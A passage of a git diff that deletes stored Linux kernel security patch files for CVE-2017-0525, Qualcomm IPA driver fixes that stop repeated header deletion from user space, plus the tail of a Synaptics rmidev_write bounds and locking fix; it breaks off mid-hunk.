-+	mutex_lock(&(dev_data->file_mutex));
- 
-+	if (*f_pos > REG_ADDR_LIMIT) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 	if (count > (REG_ADDR_LIMIT - *f_pos))
- 		count = REG_ADDR_LIMIT - *f_pos;
-+	if (count == 0) {
-+		retval = 0;
-+		goto unlock;
-+	}
- 
- 	rmidev_allocate_buffer(count);
- 
--	if (copy_from_user(rmidev->tmpbuf, buf, count))
--		return -EFAULT;
--
--	mutex_lock(&(dev_data->file_mutex));
--
-+	if (copy_from_user(rmidev->tmpbuf, buf, count)) {
-+		retval = -EFAULT;
-+		goto unlock;
-+	}
- 	retval = synaptics_rmi4_reg_write(rmidev->rmi4_data,
- 			*f_pos,
- 			rmidev->tmpbuf,
-@@ -656,8 +668,8 @@ static ssize_t rmidev_write(struct file *filp, const char __user *buf,
- 	if (retval >= 0)
- 		*f_pos += retval;
- 
-+unlock:
- 	mutex_unlock(&(dev_data->file_mutex));
--
- 	return retval;
- }
- 
diff --git a/Patches/Linux_CVEs/CVE-2017-0525/3.10/0001.patch b/Patches/Linux_CVEs/CVE-2017-0525/3.10/0001.patch
deleted file mode 100644
index e259c4d6..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0525/3.10/0001.patch
+++ /dev/null
@@ -1,323 +0,0 @@
-From 58a0d46820909166c89286bdbffbae3358daf778 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Mon, 16 Jan 2017 00:17:04 +0200
-Subject: msm: ipa: Prevent multiple header deletion from user space
-
-An IPA header or processing context can be added once
-and later deleted once from user space.
-Multiple deletion may cause invalid state of the headers
-software cache.
-
-Change-Id: Ic0b8472b7fd8a76233a007d90c832af726184574
-CRs-fixed: 1097714
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa.c     | 13 ++++---
- drivers/platform/msm/ipa/ipa_hdr.c | 77 +++++++++++++++++++++++++++++++-------
- drivers/platform/msm/ipa/ipa_i.h   | 11 +++++-
- 3 files changed, 79 insertions(+), 22 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa.c b/drivers/platform/msm/ipa/ipa.c
-index ddb716c..82caefc 100644
---- a/drivers/platform/msm/ipa/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -436,7 +436,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		if (ipa_del_hdr((struct ipa_ioc_del_hdr *)param)) {
-+		if (ipa_del_hdr_by_user((struct ipa_ioc_del_hdr *)param,
-+			true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -1117,8 +1118,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EFAULT;
- 			break;
- 		}
--		if (ipa_del_hdr_proc_ctx(
--			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
-+		if (ipa_del_hdr_proc_ctx_by_user(
-+			(struct ipa_ioc_del_hdr_proc_ctx *)param, true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -2256,7 +2257,7 @@ fail_schedule_delayed_work:
- 	if (ipa_ctx->dflt_v4_rt_rule_hdl)
- 		__ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
- 	if (ipa_ctx->excp_hdr_hdl)
--		__ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+		__ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- 	ipa_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- fail_cmd:
- 	return result;
-@@ -2268,7 +2269,7 @@ static void ipa_teardown_apps_pipes(void)
- 	ipa_teardown_sys_pipe(ipa_ctx->clnt_hdl_data_in);
- 	__ipa_del_rt_rule(ipa_ctx->dflt_v6_rt_rule_hdl);
- 	__ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
--	__ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+	__ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- 	ipa_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- }
- 
-diff --git a/drivers/platform/msm/ipa/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_hdr.c
-index 67aa787..45b0ef6 100644
---- a/drivers/platform/msm/ipa/ipa_hdr.c
-+++ b/drivers/platform/msm/ipa/ipa_hdr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -719,7 +719,8 @@ error:
- 	return -EPERM;
- }
- 
--static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
-+static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl,
-+	bool release_hdr, bool by_user)
- {
- 	struct ipa_hdr_proc_ctx_entry *entry;
- 	struct ipa_hdr_proc_ctx_tbl *htbl = &ipa_ctx->hdr_proc_ctx_tbl;
-@@ -733,6 +734,14 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	IPADBG("del ctx proc cnt=%d ofst=%d\n",
- 		htbl->proc_ctx_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("proc_ctx already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("proc_ctx_hdl %x ref_cnt %d\n",
- 			proc_ctx_hdl, entry->ref_cnt);
-@@ -740,7 +749,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	}
- 
- 	if (release_hdr)
--		__ipa_release_hdr(entry->hdr->id);
-+		__ipa_del_hdr(entry->hdr->id, false);
- 
- 	/* move the offset entry to appropriate free list */
- 	list_move(&entry->offset_entry->link,
-@@ -757,7 +766,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
- 
- 
--int __ipa_del_hdr(u32 hdr_hdl)
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user)
- {
- 	struct ipa_hdr_entry *entry;
- 	struct ipa_hdr_tbl *htbl = &ipa_ctx->hdr_tbl;
-@@ -776,6 +785,14 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 	IPADBG("del hdr of sz=%d hdr_cnt=%d ofst=%d\n", entry->hdr_len,
- 			htbl->hdr_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("hdr already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt);
- 		return 0;
-@@ -786,7 +803,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 			entry->phys_base,
- 			entry->hdr_len,
- 			DMA_TO_DEVICE);
--		__ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false);
-+		__ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false, false);
- 	} else {
- 		/* move the offset entry to appropriate free list */
- 		list_move(&entry->offset_entry->link,
-@@ -849,15 +866,16 @@ bail:
- EXPORT_SYMBOL(ipa_add_hdr);
- 
- /**
-- * ipa_del_hdr() - Remove the specified headers from SW and optionally commit them
-- * to IPA HW
-+ * ipa_del_hdr_by_user() - Remove the specified headers
-+ * from SW and optionally commit them to IPA HW
-  * @hdls:	[inout] set of headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+int ipa_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user)
- {
- 	int i;
- 	int result = -EFAULT;
-@@ -869,7 +887,7 @@ int ipa_del_hdr(struct ipa_ioc_del_hdr *hdls)
- 
- 	mutex_lock(&ipa_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa_del_hdr(hdls->hdl[i].hdl)) {
-+		if (__ipa_del_hdr(hdls->hdl[i].hdl, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -888,6 +906,20 @@ bail:
- 	mutex_unlock(&ipa_ctx->lock);
- 	return result;
- }
-+
-+/**
-+ * ipa_del_hdr() - Remove the specified headers from SW and optionally commit them
-+ * to IPA HW
-+ * @hdls:	[inout] set of headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+{
-+	return ipa_del_hdr_by_user(hdls, false);
-+}
- EXPORT_SYMBOL(ipa_del_hdr);
- 
- /**
-@@ -936,16 +968,18 @@ bail:
- EXPORT_SYMBOL(ipa_add_hdr_proc_ctx);
- 
- /**
-- * ipa_del_hdr_proc_ctx() -
-+ * ipa_del_hdr_proc_ctx_by_user() -
-  * Remove the specified processing context headers from SW and
-  * optionally commit them to IPA HW.
-  * @hdls:	[inout] set of processing context headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+int ipa_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user)
- {
- 	int i;
- 	int result;
-@@ -957,7 +991,7 @@ int ipa_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
- 
- 	mutex_lock(&ipa_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) {
-+		if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -976,6 +1010,21 @@ bail:
- 	mutex_unlock(&ipa_ctx->lock);
- 	return result;
- }
-+
-+/**
-+ * ipa_del_hdr_proc_ctx() -
-+ * Remove the specified processing context headers from SW and
-+ * optionally commit them to IPA HW.
-+ * @hdls:	[inout] set of processing context headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+{
-+	return ipa_del_hdr_proc_ctx_by_user(hdls, false);
-+}
- EXPORT_SYMBOL(ipa_del_hdr_proc_ctx);
- 
- /**
-@@ -1197,7 +1246,7 @@ int __ipa_release_hdr(u32 hdr_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa_del_hdr(hdr_hdl)) {
-+	if (__ipa_del_hdr(hdr_hdl, false)) {
- 		IPADBG("fail to del hdr %x\n", hdr_hdl);
- 		result = -EFAULT;
- 		goto bail;
-@@ -1225,7 +1274,7 @@ int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true)) {
-+	if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) {
- 		IPADBG("fail to del hdr %x\n", proc_ctx_hdl);
- 		result = -EFAULT;
- 		goto bail;
-diff --git a/drivers/platform/msm/ipa/ipa_i.h b/drivers/platform/msm/ipa/ipa_i.h
-index ed05434..c71862c 100644
---- a/drivers/platform/msm/ipa/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -224,6 +224,7 @@ struct ipa_rt_tbl {
-  * @id: header entry id
-  * @is_eth2_ofst_valid: is eth2_ofst field valid?
-  * @eth2_ofst: offset to start of Ethernet-II/802.3 header
-+ * @user_deleted: is the header deleted by the user?
-  */
- struct ipa_hdr_entry {
- 	struct list_head link;
-@@ -241,6 +242,7 @@ struct ipa_hdr_entry {
- 	int id;
- 	u8 is_eth2_ofst_valid;
- 	u16 eth2_ofst;
-+	bool user_deleted;
- };
- 
- /**
-@@ -316,6 +318,7 @@ struct ipa_hdr_proc_ctx_add_hdr_cmd_seq {
-  * @cookie: cookie used for validity check
-  * @ref_cnt: reference counter of routing table
-  * @id: processing context header entry id
-+ * @user_deleted: is the hdr processing context deleted by the user?
-  */
- struct ipa_hdr_proc_ctx_entry {
- 	struct list_head link;
-@@ -325,6 +328,7 @@ struct ipa_hdr_proc_ctx_entry {
- 	u32 cookie;
- 	u32 ref_cnt;
- 	int id;
-+	bool user_deleted;
- };
- 
- /**
-@@ -1136,8 +1140,11 @@ void ipa_inc_client_enable_clks(void);
- int ipa_inc_client_enable_clks_no_block(void);
- void ipa_dec_client_disable_clks(void);
- int ipa_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev);
-+int ipa_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user);
-+int ipa_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user);
- int __ipa_del_rt_rule(u32 rule_hdl);
--int __ipa_del_hdr(u32 hdr_hdl);
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user);
- int __ipa_release_hdr(u32 hdr_hdl);
- int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl);
- int _ipa_read_gen_reg_v1_0(char *buff, int max_len);
--- 
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0525/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0525/3.18/0002.patch
deleted file mode 100644
index 54ca163d..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0525/3.18/0002.patch
+++ /dev/null
@@ -1,663 +0,0 @@
-From a6a6e4993aca80b7cddab8752f7d8636eb45a8c5 Mon Sep 17 00:00:00 2001
-From: Ghanim Fodi <gfodi@codeaurora.org>
-Date: Thu, 12 Jan 2017 15:14:15 +0200
-Subject: msm: ipa: Prevent multiple header deletion from user space
-
-An IPA header or processing context can be added once
-and later deleted once from user space.
-Multiple deletion may cause invalid state of the headers
-software cache.
-
-Change-Id: Ic0b8472b7fd8a76233a007d90c832af726184574
-CRs-fixed: 1097714
-Signed-off-by: Ghanim Fodi <gfodi@codeaurora.org>
----
- drivers/platform/msm/ipa/ipa_v2/ipa.c     | 13 ++---
- drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c | 79 +++++++++++++++++++++++++------
- drivers/platform/msm/ipa/ipa_v2/ipa_i.h   | 13 ++++-
- drivers/platform/msm/ipa/ipa_v3/ipa.c     | 11 +++--
- drivers/platform/msm/ipa/ipa_v3/ipa_hdr.c | 79 +++++++++++++++++++++++++------
- drivers/platform/msm/ipa/ipa_v3/ipa_i.h   | 11 ++++-
- 6 files changed, 162 insertions(+), 44 deletions(-)
-
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa.c b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-index 7bcb267..d6f2ce6 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -734,7 +734,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EINVAL;
- 			break;
- 		}
--		if (ipa2_del_hdr((struct ipa_ioc_del_hdr *)param)) {
-+		if (ipa2_del_hdr_by_user((struct ipa_ioc_del_hdr *)param,
-+			true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -1418,8 +1419,8 @@ static long ipa_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EINVAL;
- 			break;
- 		}
--		if (ipa2_del_hdr_proc_ctx(
--			(struct ipa_ioc_del_hdr_proc_ctx *)param)) {
-+		if (ipa2_del_hdr_proc_ctx_by_user(
-+			(struct ipa_ioc_del_hdr_proc_ctx *)param, true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -2801,7 +2802,7 @@ fail_schedule_delayed_work:
- 	if (ipa_ctx->dflt_v4_rt_rule_hdl)
- 		__ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
- 	if (ipa_ctx->excp_hdr_hdl)
--		__ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+		__ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- 	ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- fail_cmd:
- 	return result;
-@@ -2813,7 +2814,7 @@ static void ipa_teardown_apps_pipes(void)
- 	ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_data_in);
- 	__ipa_del_rt_rule(ipa_ctx->dflt_v6_rt_rule_hdl);
- 	__ipa_del_rt_rule(ipa_ctx->dflt_v4_rt_rule_hdl);
--	__ipa_del_hdr(ipa_ctx->excp_hdr_hdl);
-+	__ipa_del_hdr(ipa_ctx->excp_hdr_hdl, false);
- 	ipa2_teardown_sys_pipe(ipa_ctx->clnt_hdl_cmd);
- }
- 
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-index ee4ddbb..6a66b0b 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_hdr.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -805,7 +805,8 @@ error:
- 	return -EPERM;
- }
- 
--static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
-+static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl,
-+	bool release_hdr, bool by_user)
- {
- 	struct ipa_hdr_proc_ctx_entry *entry;
- 	struct ipa_hdr_proc_ctx_tbl *htbl = &ipa_ctx->hdr_proc_ctx_tbl;
-@@ -819,6 +820,14 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	IPADBG("del ctx proc cnt=%d ofst=%d\n",
- 		htbl->proc_ctx_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("proc_ctx already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("proc_ctx_hdl %x ref_cnt %d\n",
- 			proc_ctx_hdl, entry->ref_cnt);
-@@ -826,7 +835,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- 	}
- 
- 	if (release_hdr)
--		__ipa_del_hdr(entry->hdr->id);
-+		__ipa_del_hdr(entry->hdr->id, false);
- 
- 	/* move the offset entry to appropriate free list */
- 	list_move(&entry->offset_entry->link,
-@@ -843,7 +852,7 @@ static int __ipa_del_hdr_proc_ctx(u32 proc_ctx_hdl, bool release_hdr)
- }
- 
- 
--int __ipa_del_hdr(u32 hdr_hdl)
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user)
- {
- 	struct ipa_hdr_entry *entry;
- 	struct ipa_hdr_tbl *htbl = &ipa_ctx->hdr_tbl;
-@@ -854,7 +863,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 		return -EINVAL;
- 	}
- 
--	if (!entry || (entry->cookie != IPA_COOKIE)) {
-+	if (entry->cookie != IPA_COOKIE) {
- 		IPAERR("bad parm\n");
- 		return -EINVAL;
- 	}
-@@ -866,6 +875,14 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 		IPADBG("del hdr of sz=%d hdr_cnt=%d ofst=%d\n", entry->hdr_len,
- 			htbl->hdr_cnt, entry->offset_entry->offset);
- 
-+	if (by_user && entry->user_deleted) {
-+		IPAERR("hdr already deleted by user\n");
-+		return -EINVAL;
-+	}
-+
-+	if (by_user)
-+		entry->user_deleted = true;
-+
- 	if (--entry->ref_cnt) {
- 		IPADBG("hdr_hdl %x ref_cnt %d\n", hdr_hdl, entry->ref_cnt);
- 		return 0;
-@@ -876,7 +893,7 @@ int __ipa_del_hdr(u32 hdr_hdl)
- 			entry->phys_base,
- 			entry->hdr_len,
- 			DMA_TO_DEVICE);
--		__ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false);
-+		__ipa_del_hdr_proc_ctx(entry->proc_ctx->id, false, false);
- 	} else {
- 		/* move the offset entry to appropriate free list */
- 		list_move(&entry->offset_entry->link,
-@@ -943,15 +960,16 @@ bail:
- }
- 
- /**
-- * ipa2_del_hdr() - Remove the specified headers from SW and optionally commit them
-- * to IPA HW
-+ * ipa2_del_hdr_by_user() - Remove the specified headers
-+ * from SW and optionally commit them to IPA HW
-  * @hdls:	[inout] set of headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user)
- {
- 	int i;
- 	int result = -EFAULT;
-@@ -968,7 +986,7 @@ int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
- 
- 	mutex_lock(&ipa_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa_del_hdr(hdls->hdl[i].hdl)) {
-+		if (__ipa_del_hdr(hdls->hdl[i].hdl, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -989,6 +1007,20 @@ bail:
- }
- 
- /**
-+ * ipa2_del_hdr() - Remove the specified headers from SW and optionally commit them
-+ * to IPA HW
-+ * @hdls:	[inout] set of headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls)
-+{
-+	return ipa2_del_hdr_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa2_add_hdr_proc_ctx() - add the specified headers to SW
-  * and optionally commit them to IPA HW
-  * @proc_ctxs:	[inout] set of processing context headers to add
-@@ -1040,16 +1072,18 @@ bail:
- }
- 
- /**
-- * ipa2_del_hdr_proc_ctx() -
-+ * ipa2_del_hdr_proc_ctx_by_user() -
-  * Remove the specified processing context headers from SW and
-  * optionally commit them to IPA HW.
-  * @hdls:	[inout] set of processing context headers to delete
-+ * @by_user:	Operation requested by user?
-  *
-  * Returns:	0 on success, negative on failure
-  *
-  * Note:	Should not be called from atomic context
-  */
--int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user)
- {
- 	int i;
- 	int result;
-@@ -1068,7 +1102,7 @@ int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
- 
- 	mutex_lock(&ipa_ctx->lock);
- 	for (i = 0; i < hdls->num_hdls; i++) {
--		if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true)) {
-+		if (__ipa_del_hdr_proc_ctx(hdls->hdl[i].hdl, true, by_user)) {
- 			IPAERR("failed to del hdr %i\n", i);
- 			hdls->hdl[i].status = -1;
- 		} else {
-@@ -1089,6 +1123,21 @@ bail:
- }
- 
- /**
-+ * ipa2_del_hdr_proc_ctx() -
-+ * Remove the specified processing context headers from SW and
-+ * optionally commit them to IPA HW.
-+ * @hdls:	[inout] set of processing context headers to delete
-+ *
-+ * Returns:	0 on success, negative on failure
-+ *
-+ * Note:	Should not be called from atomic context
-+ */
-+int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls)
-+{
-+	return ipa2_del_hdr_proc_ctx_by_user(hdls, false);
-+}
-+
-+/**
-  * ipa2_commit_hdr() - commit to IPA HW the current header table in SW
-  *
-  * Returns:	0 on success, negative on failure
-@@ -1316,7 +1365,7 @@ int __ipa_release_hdr(u32 hdr_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa_del_hdr(hdr_hdl)) {
-+	if (__ipa_del_hdr(hdr_hdl, false)) {
- 		IPADBG("fail to del hdr %x\n", hdr_hdl);
- 		result = -EFAULT;
- 		goto bail;
-@@ -1344,7 +1393,7 @@ int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl)
- {
- 	int result = 0;
- 
--	if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true)) {
-+	if (__ipa_del_hdr_proc_ctx(proc_ctx_hdl, true, false)) {
- 		IPADBG("fail to del hdr %x\n", proc_ctx_hdl);
- 		result = -EFAULT;
- 		goto bail;
-diff --git a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-index 67d8c94..9094f19 100644
---- a/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-+++ b/drivers/platform/msm/ipa/ipa_v2/ipa_i.h
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2017, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -254,6 +254,7 @@ struct ipa_rt_tbl {
-  * @id: header entry id
-  * @is_eth2_ofst_valid: is eth2_ofst field valid?
-  * @eth2_ofst: offset to start of Ethernet-II/802.3 header
-+ * @user_deleted: is the header deleted by the user?
-  */
- struct ipa_hdr_entry {
- 	struct list_head link;
-@@ -271,6 +272,7 @@ struct ipa_hdr_entry {
- 	int id;
- 	u8 is_eth2_ofst_valid;
- 	u16 eth2_ofst;
-+	bool user_deleted;
- };
- 
- /**
-@@ -334,6 +336,7 @@ struct ipa_hdr_proc_ctx_add_hdr_cmd_seq {
-  * @cookie: cookie used for validity check
-  * @ref_cnt: reference counter of routing table
-  * @id: processing context header entry id
-+ * @user_deleted: is the hdr processing context deleted by the user?
-  */
- struct ipa_hdr_proc_ctx_entry {
- 	struct list_head link;
-@@ -343,6 +346,7 @@ struct ipa_hdr_proc_ctx_entry {
- 	u32 cookie;
- 	u32 ref_cnt;
- 	int id;
-+	bool user_deleted;
- };
- 
- /**
-@@ -1361,6 +1365,8 @@ int ipa2_add_hdr(struct ipa_ioc_add_hdr *hdrs);
- 
- int ipa2_del_hdr(struct ipa_ioc_del_hdr *hdls);
- 
-+int ipa2_del_hdr_by_user(struct ipa_ioc_del_hdr *hdls, bool by_user);
-+
- int ipa2_commit_hdr(void);
- 
- int ipa2_reset_hdr(void);
-@@ -1378,6 +1384,9 @@ int ipa2_add_hdr_proc_ctx(struct ipa_ioc_add_hdr_proc_ctx *proc_ctxs);
- 
- int ipa2_del_hdr_proc_ctx(struct ipa_ioc_del_hdr_proc_ctx *hdls);
- 
-+int ipa2_del_hdr_proc_ctx_by_user(struct ipa_ioc_del_hdr_proc_ctx *hdls,
-+	bool by_user);
-+
- /*
-  * Routing
-  */
-@@ -1669,7 +1678,7 @@ int ipa2_active_clients_log_print_table(char *buf, int size);
- void ipa2_active_clients_log_clear(void);
- int ipa_interrupts_init(u32 ipa_irq, u32 ee, struct device *ipa_dev);
- int __ipa_del_rt_rule(u32 rule_hdl);
--int __ipa_del_hdr(u32 hdr_hdl);
-+int __ipa_del_hdr(u32 hdr_hdl, bool by_user);
- int __ipa_release_hdr(u32 hdr_hdl);
- int __ipa_release_hdr_proc_ctx(u32 proc_ctx_hdl);
- int _ipa_read_gen_reg_v1_1(char *buff, int max_len);
-diff --git a/drivers/platform/msm/ipa/ipa_v3/ipa.c b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-index e87c4e2..aa83cbd 100644
---- a/drivers/platform/msm/ipa/ipa_v3/ipa.c
-+++ b/drivers/platform/msm/ipa/ipa_v3/ipa.c
-@@ -784,7 +784,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EINVAL;
- 			break;
- 		}
--		if (ipa3_del_hdr((struct ipa_ioc_del_hdr *)param)) {
-+		if (ipa3_del_hdr_by_user((struct ipa_ioc_del_hdr *)param,
-+			true)) {
- 			retval = -EFAULT;
- 			break;
- 		}
-@@ -1553,8 +1554,8 @@ static long ipa3_ioctl(struct file *filp, unsigned int cmd, unsigned long arg)
- 			retval = -EINVAL;
- 			break;
- 		}
--		if (ipa3_del_hdr_proc_ctx(
